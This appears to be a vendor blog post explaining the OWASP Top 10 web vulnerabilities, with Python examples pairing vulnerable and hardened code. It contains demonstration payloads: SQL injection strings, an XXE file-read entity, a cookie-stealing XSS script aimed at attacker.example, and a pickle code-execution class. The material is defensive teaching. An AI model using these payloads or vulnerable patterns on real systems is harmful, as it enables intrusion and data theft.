OWASP Top 10 Vulnerabilities

Updated 19 October 2023

The OWASP Top 10 is a list that gives developers and security professionals guidance on the most critical categories of vulnerability commonly found in web applications, which attackers can exploit with little effort when an application is built or configured insecurely.

OWASP ranks the categories by risk, weighing how widespread each one is against how easy it is to exploit and detect and how severe its technical impact is.

The 2017 list was built from data submitted by more than 40 firms that specialize in application security and from an industry survey completed by over 500 individual professionals.

WHAT IS NEW IN OWASP TOP 10-2017?

When we compare the 2013 and 2017 lists, we find three new categories:

1. XML External Entities (XXE)

2. Insecure Deserialization

3. Insufficient Logging & Monitoring

Insecure Direct Object References [2013] was merged with Missing Function Level Access Control [2013] into Broken Access Control [2017], while Cross-Site Request Forgery [2013] and Unvalidated Redirects and Forwards [2013] were dropped.

 
1. INJECTION

Injection holds the top spot in both 2013 and 2017. It occurs when untrusted data is sent to an interpreter as part of a command or query, so the interpreter can no longer tell data from code. Common variants are SQL, NoSQL, OS command, and LDAP injection.

Almost any source of data can serve as an injection vector: environment variables, request parameters, and data returned by external or internal web services.

Attackers can exploit this whenever user-supplied data is not validated, filtered, or sanitized, and above all when it is concatenated into the command text instead of being passed through a parameterized interface.
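The difference between concatenating input into a query and binding it as a parameter, shown below as an added Python example that is not part of the original post. The in-memory SQLite table, the user rows and the payload strings are all constructed for the demonstration; nothing here is Webkul's or OWASP's code.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b"), ("admin", "hash-x")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Untrusted input is concatenated into the query text, so the SQL interpreter
    cannot tell data from code: a quote character in the input rewrites the query."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterized query: the SQL text is fixed and the value is bound separately,
    so whatever the input contains, it is only ever compared as a string."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed payloads: the first closes the string literal and appends a tautology,
# the second comments out the rest of the query to log in as a chosen account.
TAUTOLOGY = "x' OR '1'='1"
COMMENT_OUT = "admin' --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, TAUTOLOGY))    # every row is returned
    print("vulnerable:", find_user_vulnerable(db, COMMENT_OUT))  # the admin row
    print("safe:      ", find_user_safe(db, TAUTOLOGY))          # no user has that literal name
```

The same rule applies to the other interpreters named above: pass OS commands as an argument list rather than a shell string, and build LDAP or NoSQL filters through the client library's escaping or parameter API instead of string formatting.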

 

2. BROKEN AUTHENTICATION

Authentication and session-management functions are often implemented incorrectly, which lets attackers compromise passwords, keys, or session tokens, or assume other users' identities.

Permitting default, weak, or guessable credentials, and storing passwords in plain text or without a strong, salted password hash, lets attackers bypass authentication.

Improper creation and invalidation of session IDs, keys, and tokens, and weak or ineffective credential-recovery and forgot-password flows, also lead to Broken Authentication.
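The three controls the paragraphs above call for (reject weak credentials, store passwords as salted slow hashes, issue unpredictable session tokens and destroy them on logout) in one added Python example; this is illustrative code written for this page, not Webkul's or OWASP's. The iteration count, the block list of common passwords and the in-memory session store are assumptions for the demo.

```python
import hashlib
import hmac
import os
import secrets
from typing import Optional

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; assumption, tune per deployment
# Constructed block list standing in for a real list of common or breached passwords.
COMMON_PASSWORDS = {"password", "123456", "admin", "admin123", "welcome", "qwerty"}


def password_acceptable(password: str) -> bool:
    """Reject short, default or commonly used passwords at registration time."""
    return len(password) >= 12 and password.lower() not in COMMON_PASSWORDS


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Store a per-user salted, deliberately slow hash; never the plain text."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def new_session_token() -> str:
    """Session IDs must be unpredictable: 256 bits from the OS CSPRNG,
    not a counter, a timestamp or a hash of the username."""
    return secrets.token_urlsafe(32)


class SessionStore:
    """In-memory session store (constructed for the demo). Tokens are created
    only after a successful password check and removed on logout, so a
    stolen token stops working as soon as the user signs out."""

    def __init__(self):
        self._sessions = {}

    def login(self, username: str, password: str, stored_hash: str) -> Optional[str]:
        if not verify_password(password, stored_hash):
            return None
        token = new_session_token()
        self._sessions[token] = username
        return token

    def user_for(self, token: str) -> Optional[str]:
        return self._sessions.get(token)

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)
```

A production system would add rate limiting and lockout on repeated failures, multi-factor authentication, and a reset flow that expires its tokens; the point here is that the same salt never hashes two users' passwords and that a session token carries no information an attacker could guess.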

3. SENSITIVE DATA EXPOSURE

Sensitive data is exposed when it is not protected both at rest and in transit. Attackers who can read it can steal it or modify it to suit themselves.

Communication over insecure channels (plain HTTP), storing data in plain text, weak or misused cryptographic algorithms, and sending data unencrypted over untrusted networks such as public WiFi can all expose sensitive data.

Exposed data can lead to serious crimes such as identity theft and financial fraud.

4. XML EXTERNAL ENTITIES (XXE)

When an application accepts XML from the browser and parses it with an XML processor that has external entity support enabled, an attacker can read files on the application server's file system and interact with any backend or external system that the application itself can reach.

XML external entity injection lets an attacker interfere with the application's processing of XML data. It can be used to read local files, to reach internal services (server-side request forgery), to cause denial of service through entity expansion, and in some processor configurations to achieve remote code execution.
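An added Python example (written for this page, not taken from the original post or from Webkul) of the usual defence: refuse any document that carries a DOCTYPE or entity declaration before it reaches the real parser, since a document that only exchanges data never needs one. The sample order documents are constructed for the demo.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD or an entity declaration."""


def reject_dtd(data: bytes) -> None:
    """Walk the document with a bare expat parser and abort at the first DOCTYPE
    or entity declaration, before any entity could be expanded or fetched."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed (root=%r, system id=%r)" % (name, sysid))

    def on_entity(entity_name, is_parameter_entity, value, base, system_id, public_id, notation_name):
        raise UnsafeXML("entity declaration not allowed: %r" % entity_name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_untrusted(data) -> ET.Element:
    """Guard first, then build the tree with the normal parser."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    reject_dtd(data)
    return ET.fromstring(data)


# Constructed inputs: an honest order, the classic file-read XXE, and an order
# that points at an attacker-hosted DTD (a blind XXE / SSRF vector).
BENIGN = b"""<?xml version="1.0"?><order id="17"><item sku="A1" qty="2"/></order>"""

XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order id="17"><item sku="&xxe;" qty="2"/></order>"""

EXTERNAL_DTD_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE order SYSTEM "http://attacker.example/evil.dtd">
<order/>"""


if __name__ == "__main__":
    print(parse_untrusted(BENIGN).find("item").get("sku"))
    for doc in (XXE_DOC, EXTERNAL_DTD_DOC):
        try:
            parse_untrusted(doc)
        except UnsafeXML as exc:
            print("rejected:", exc)
```

Python's own ElementTree does not resolve external entities, but parsers in other stacks (and lxml when entity resolution is enabled) do, and even an internal DTD can be used for entity-expansion denial of service, so rejecting DTDs outright, as the defusedxml package does, is the simplest rule to apply at every XML entry point.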

5. BROKEN ACCESS CONTROL

Access control is broken when restrictions on what authenticated users are allowed to do are not enforced, so a user can perform actions above their privileges or on data that is not theirs.

For example, a user logged in with an ordinary account who can reach administrator functions, or another user's records simply by changing an identifier in the URL, can modify or delete other users' data and accounts, view sensitive information, and change access rights.

It is therefore recommended to define the access control rules in an access control matrix (which roles may perform which actions on which resources) and to enforce them on the server for every request, denying by default.
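The matrix idea worked through as an added Python example (not Webkul's or OWASP's code): roles map to actions and a scope, absence means deny, and the check is made against the specific object being requested, which is what closes the changed-identifier hole described above. Users, documents and the matrix entries are constructed for the demo.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str


@dataclass(frozen=True)
class Document:
    id: int
    owner_id: int
    title: str


class Forbidden(PermissionError):
    """Raised when the access control matrix does not allow the action."""


# Access control matrix (constructed): role -> action -> scope.
# "own" means the caller must own the resource, "any" means every instance.
# Any role/action pair missing from the matrix is denied (default deny).
MATRIX = {
    "user": {"read": "own", "update": "own", "delete": "own"},
    "admin": {"read": "any", "update": "any", "delete": "any", "change_rights": "any"},
}


def authorize(user: User, action: str, doc: Document) -> None:
    scope = MATRIX.get(user.role, {}).get(action)
    if scope is None:
        raise Forbidden("role %r may not %s documents" % (user.role, action))
    if scope == "own" and doc.owner_id != user.id:
        raise Forbidden("user %d may only %s their own documents" % (user.id, action))


# Constructed document store keyed by the id that appears in the URL.
DOCS = {
    1: Document(1, owner_id=10, title="alice's invoice"),
    2: Document(2, owner_id=20, title="bob's invoice"),
}


def get_document_vulnerable(user: User, doc_id: int) -> Document:
    """Only checks that *someone* is logged in: changing ?id=1 to ?id=2 in the URL
    returns another user's record (an insecure direct object reference)."""
    return DOCS[doc_id]


def get_document_safe(user: User, doc_id: int) -> Document:
    """Look the object up, then enforce the matrix against that specific object."""
    doc = DOCS[doc_id]
    authorize(user, "read", doc)
    return doc


if __name__ == "__main__":
    alice = User(10, "user")
    print(get_document_vulnerable(alice, 2).title)  # bob's invoice: access control bypassed
    try:
        get_document_safe(alice, 2)
    except Forbidden as exc:
        print("denied:", exc)
```

Two points a practitioner would check: the matrix is consulted on the server for every request (hiding a button in the UI is not access control), and a log entry for each Forbidden is valuable, since repeated denials from one account are a reliable sign of someone probing identifiers.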

6. SECURITY MISCONFIGURATION

Security Misconfiguration is generally found when an application's security settings are managed poorly, for example:

  • using insecure default credentials
  • incomplete or ad hoc configuration
  • misconfigured or missing HTTP security headers
  • displaying error messages that contain sensitive information, such as directory paths
  • not updating and upgrading the OS, frameworks, and libraries

Unauthorized access to files and directories should be restricted, and unnecessary ports, services, and pages should be disabled.
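Two of the items above, the HTTP headers and the verbose error page, can be checked mechanically. The following is an added Python example written for this page (not Webkul's or OWASP's code) that audits one HTTP response; the required-header baseline and the two sample responses are constructed and would need adjusting for a real application.

```python
import re

# Headers every HTTPS response should carry (constructed baseline; adjust per app).
REQUIRED_HEADERS = {
    "strict-transport-security": None,    # any value: forces HTTPS on return visits
    "x-content-type-options": "nosniff",  # exact value required
}
VERSION = re.compile(r"\d+\.\d+")         # matches "Apache/2.4.29", "PHP/7.2.24"
LEAK_MARKERS = ("Traceback (most recent call last)", "Stack trace:", "Fatal error:", "/var/www/")


def audit_response(status: int, headers: dict, body: str) -> list:
    """Return a list of misconfiguration findings for one HTTP response."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, expected in REQUIRED_HEADERS.items():
        if name not in h:
            findings.append("missing header: %s" % name)
        elif expected is not None and h[name].strip().lower() != expected:
            findings.append("header %s is %r, expected %r" % (name, h[name], expected))
    csp = h.get("content-security-policy", "")
    if "x-frame-options" not in h and "frame-ancestors" not in csp:
        findings.append("no clickjacking protection (X-Frame-Options or CSP frame-ancestors)")
    for banner in ("server", "x-powered-by"):
        if banner in h and VERSION.search(h[banner]):
            findings.append("%s header reveals a version: %s" % (banner, h[banner]))
    if any(marker in body for marker in LEAK_MARKERS):
        findings.append("error page leaks internal paths or a stack trace (status %d)" % status)
    return findings


# Constructed responses: a default install failing on an error, and a hardened one.
MISCONFIGURED = (
    500,
    {"Server": "Apache/2.4.29 (Ubuntu)", "X-Powered-By": "PHP/7.2.24", "Content-Type": "text/html"},
    "Fatal error: Uncaught PDOException in /var/www/html/app/etc/env.php on line 12",
)
HARDENED = (
    200,
    {
        "Server": "nginx",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
        "Content-Type": "text/html",
    },
    "<html><body>ok</body></html>",
)


if __name__ == "__main__":
    for finding in audit_response(*MISCONFIGURED):
        print("-", finding)
    print("hardened findings:", audit_response(*HARDENED))
```

Run against real traffic, the same function can be fed from an HTTP client or a proxy log; the markers and header baseline are where a team encodes its own policy.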

7. CROSS-SITE SCRIPTING (XSS)

Cross-site scripting occurs when an application includes untrusted data in a page without proper validation or escaping, allowing an attacker to execute a malicious script in the victim's browser. Request parameters, stored content such as comments or profile fields, and data pulled from other systems can all carry the payload.

XSS can be used to hijack user sessions, steal cookies, redirect victims to websites of the attacker's choice, and deface websites.

It is easy to exploit when user-supplied data is not validated, sanitized, or escaped for the context in which it is output (HTML body, attribute, URL, or script).
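An added Python example (not from the original post) of what "escaped for the context" means in practice: the same comment rendered raw and rendered through HTML escaping, plus a link helper that handles the attribute and URL contexts separately. The payload and attacker host are constructed.

```python
import html
from urllib.parse import urlsplit


def render_comment_vulnerable(author: str, text: str) -> str:
    """Untrusted strings dropped straight into HTML: a comment containing a
    <script> tag runs in every visitor's browser (stored XSS)."""
    return "<p><b>%s</b>: %s</p>" % (author, text)


def render_comment_safe(author: str, text: str) -> str:
    """Escape for the HTML body context: < > & become entities, so the browser
    shows the payload as text instead of executing it."""
    return "<p><b>%s</b>: %s</p>" % (html.escape(author), html.escape(text))


def render_link_safe(label: str, href: str) -> str:
    """Two further contexts: a URL (allow only http/https so javascript: URLs
    are neutralised) and a quoted attribute (quote=True also escapes " and ')."""
    if urlsplit(href).scheme.lower() not in ("http", "https"):
        href = "#"
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True), html.escape(label))


# Constructed payload: sends the session cookie to an attacker-controlled host.
PAYLOAD = "<script>location='http://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_link_safe("profile", "javascript:alert(document.cookie)"))
```

A template engine with auto-escaping does the body-context part by default; the URL and attribute checks, and output inside inline scripts, still need explicit handling. Marking the session cookie HttpOnly limits what a successful XSS can steal, but does not stop it from acting as the user.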

8. INSECURE DESERIALIZATION

Deserialization is the process of rebuilding an object from a serialized byte stream, the reverse of serialization. If an application deserializes data it does not fully control, an attacker can supply a crafted object that, when deserialized, grants the attacker elevated privileges or executes code of the attacker's choosing.

Insecure deserialization can lead to remote code execution, privilege escalation, replay attacks, and various injection attacks.
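How a crafted object turns deserialization into code execution, and how to refuse it, as an added Python example written for this page (not Webkul's or OWASP's code). Python's pickle format is used because its reduce protocol makes the mechanism visible in a few lines; the payload calls eval on a harmless expression as a stand-in for os.system or anything else the attacker chooses.

```python
import io
import json
import pickle


class Exploit:
    """Attacker-crafted object: when unpickled, pickle calls the callable from
    __reduce__ with the given arguments. eval("7 * 6") is a harmless stand-in
    for os.system(...) or any other callable reachable by name."""

    def __reduce__(self):
        return (eval, ("7 * 6",))


MALICIOUS = pickle.dumps(Exploit())                                # what an attacker would send
SAFE_PAYLOAD = pickle.dumps({"order": 17, "items": ["A1", "B2"]})  # honest data, no globals


def load_vulnerable(data: bytes):
    """pickle.loads on untrusted bytes: the payload decides which code runs."""
    return pickle.loads(data)


class UnsafePayload(pickle.UnpicklingError):
    pass


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup, so no callable can be smuggled into the stream.
    Plain containers and scalars never trigger find_class; extend ALLOWED only
    with classes you have reviewed, as (module, name) pairs."""

    ALLOWED = frozenset()

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise UnsafePayload("global %s.%s is forbidden in untrusted data" % (module, name))


def load_safe(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_json(text: str):
    """Preferred: a data-only format that cannot carry code at all."""
    return json.loads(text)


if __name__ == "__main__":
    print("vulnerable loader ran attacker code, result:", load_vulnerable(MALICIOUS))
    try:
        load_safe(MALICIOUS)
    except UnsafePayload as exc:
        print("restricted loader refused:", exc)
    print(load_safe(SAFE_PAYLOAD))
```

The same pattern (a native object graph whose construction is driven by the input) is what makes Java, PHP and .NET deserialization dangerous; the durable fix is to exchange only data formats such as JSON and, where a native format is unavoidable, to sign the serialized bytes and verify the signature before parsing.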

9. USING COMPONENTS WITH KNOWN VULNERABILITIES

Applications that use vulnerable, unpatched components such as frameworks, software modules, and libraries inherit those components' weaknesses. Because exploits for known vulnerabilities are often public, attackers can use them with little effort to expose sensitive data or reach other weaknesses in the application.

Regular security reviews, an inventory of the components in use and their versions, and prompt updates help prevent this.

10. INSUFFICIENT LOGGING & MONITORING

Poor logging and monitoring allow attackers to work unnoticed.

An unnoticed attacker can install a backdoor, maintain persistence, and move on to other systems in the organization.

Sufficient monitoring helps detect attacks at an earlier stage, and logs help improve security configuration, find weaknesses, and support forensic analysis.
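What "sufficient monitoring" looks like at the smallest scale, as an added Python example (not from the original post): a sliding-window detector run over a constructed authentication log. The log format, the source addresses and the threshold are assumptions for the demo; the pattern it catches, a burst of failed logins followed by a success from the same address, is the one that credential stuffing and brute force leave behind.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log in a simple key=value format (not from the page).
SAMPLE_LOG = """\
2023-10-19T10:00:01 ip=203.0.113.7 event=login_failed user=alice
2023-10-19T10:00:03 ip=203.0.113.7 event=login_failed user=bob
2023-10-19T10:00:05 ip=203.0.113.7 event=login_failed user=carol
2023-10-19T10:00:08 ip=203.0.113.7 event=login_failed user=dave
2023-10-19T10:00:11 ip=203.0.113.7 event=login_failed user=erin
2023-10-19T10:00:14 ip=203.0.113.7 event=login_failed user=frank
2023-10-19T10:00:20 ip=203.0.113.7 event=login_ok user=carol
2023-10-19T10:05:00 ip=198.51.100.2 event=login_failed user=dave
2023-10-19T10:05:30 ip=198.51.100.2 event=login_ok user=dave
2023-10-19T10:06:00 ip=198.51.100.9 event=page_view user=-
"""

LINE = re.compile(r"^(\S+) ip=(\S+) event=(\S+) user=(\S+)$")


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert when one source IP accumulates `threshold` failed logins inside
    `window`, and again if a login then succeeds from that IP (likely guessed)."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # unparseable line: skipped here; count these in production
        ts = datetime.fromisoformat(m.group(1))
        ip, event, user = m.group(2), m.group(3), m.group(4)
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()  # forget failures that fell out of the sliding window
        if event == "login_failed":
            recent.append(ts)
            if len(recent) == threshold:  # fire once, as the threshold is crossed
                alerts.append({"kind": "bruteforce", "ip": ip, "at": ts, "failures": len(recent)})
        elif event == "login_ok" and len(recent) >= threshold:
            alerts.append({"kind": "success_after_failures", "ip": ip, "at": ts, "user": user})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

For this to work in a real deployment the application has to log the events in the first place, with a timestamp, the source address and the outcome, ship them somewhere the attacker cannot erase them, and route the alerts to someone who will act on them; the second alert type is the one worth paging on.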

Conclusion

Web application security is a major concern these days, as the implications of such vulnerabilities can be severe.

If you are looking for a security audit service that identifies vulnerabilities such as cross-site scripting, guessable credentials, unattended application security flaws, and other misconfigurations in your e-commerce store, check out the Webkul basic security module.

Check out this Magento 2-based eCommerce store security extension which is customizable.

Need Support?

Thank You for reading this Blog!

For further more interesting blogs, keep in touch with us. If you need any kind of support, simply raise a ticket at https://webkul.uvdesk.com/en/.

You may also visit our Odoo development services and quality Odoo Extensions.

For further help or queries, please contact us or raise a ticket.
